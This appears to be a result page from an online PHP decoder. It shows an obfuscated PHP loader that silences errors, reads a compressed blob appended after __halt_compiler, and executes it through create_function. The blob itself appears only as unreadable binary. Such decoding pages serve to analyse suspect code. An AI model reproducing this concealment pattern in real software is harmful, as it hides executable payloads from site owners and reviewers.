Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
error_reporting(0);$handle = fopen(__FILE__, 'r');fseek($handle, 369);$data = stream_get_c..
Decoded Output download
<? error_reporting(0);$handle = fopen(__FILE__, 'r');fseek($handle, 369);$data = stream_get_contents($handle);fclose($handle);$f = create_function('$value', gzuncompress(strrev(substr($data, 32))));$f(substr($data, 0, 32)); ?>
dde6e04bada469c6afd5e43b45ef3b66?@????-#x??rJ??&?t??r?E&r?4w??????$R??C`?.????????kf????"?k
R]??rB??HsLsS???b=s_p?P?]`?????I?^E????????b??g;?Q???k?Z8??!????V?%?[?+Bu??#?RW????f?!q????>?zcx???v?7RN|?[4zBP?w?w???s????[?4$??B?}~
I?*??me?^0?K_PU?x
Did this file decode correctly?
Original Code
error_reporting(0);$handle = fopen(__FILE__, 'r');fseek($handle, 369);$data = stream_get_contents($handle);fclose($handle);$f = create_function('$value', gzuncompress(strrev(substr($data, 32))));$f(substr($data, 0, 32));__halt_compiler();
dde6e04bada469c6afd5e43b45ef3b66?@????-#x??rJ??&?t??r?E&r?4w??????$R??C`?.????????kf????"?k
R]??rB??HsLsS???b=s_p?P?]`?????I?^E????????b??g;?Q???k?Z8??!????V?%?[?+Bu??#?RW????f?!q????>?zcx???v?7RN|?[4zBP?w?w???s????[?4$??B?}~
I?*??me?^0?K_PU?x
Function Calls
fopen | 1 |
fseek | 1 |
error_reporting | 1 |
Stats
MD5 | 621cb399f1fce2319df60f26c048016b |
Eval Count | 0 |
Decode Time | 60 ms |